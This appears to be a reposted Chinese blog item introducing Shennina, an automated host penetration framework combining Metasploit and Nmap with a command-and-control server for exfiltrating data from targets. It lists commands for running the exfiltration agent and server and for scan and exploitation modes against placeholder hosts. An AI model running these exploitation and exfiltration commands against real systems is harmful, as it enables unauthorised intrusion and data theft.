Shennina 自动化主机渗透工具

 

0x01 工具介绍

Shennina是一款功能强大的自动化主机渗透/漏洞利用框架，该项目的主要目的是使用人工智能技术来实现安全扫描、漏洞扫描/分析和漏洞利用开发的完全自动化。Shennina整合了Metasploit和Nmap这两款强大的网络安全工具实现其部分功能，并执行渗透测试。除此之外，该工具还整合了一个命令控制服务器用于从目标主机中自动过滤数据。

0x02 安装与使用

1、过滤服务器-代理

Linux/macOS./exfiltration-server/agent.shWindows./exfiltration-server/agent.ps1

2、过滤服务器-运行

$ cd ./exfiltration-server/$ ./run-server.sh

3、MSFRPCD服务器

./scripts/run-msfrp.py

4、运行服务扫描

$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only

5、以训练模式运行Shennina

$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local

6、渗透测试模式

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode

7、渗透测试模式-启发式

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode

0x03 项目链接

https://github.com/mazen160/shennina

 

原文始发于微信公众号（黑白之道）：自动化主机渗透工具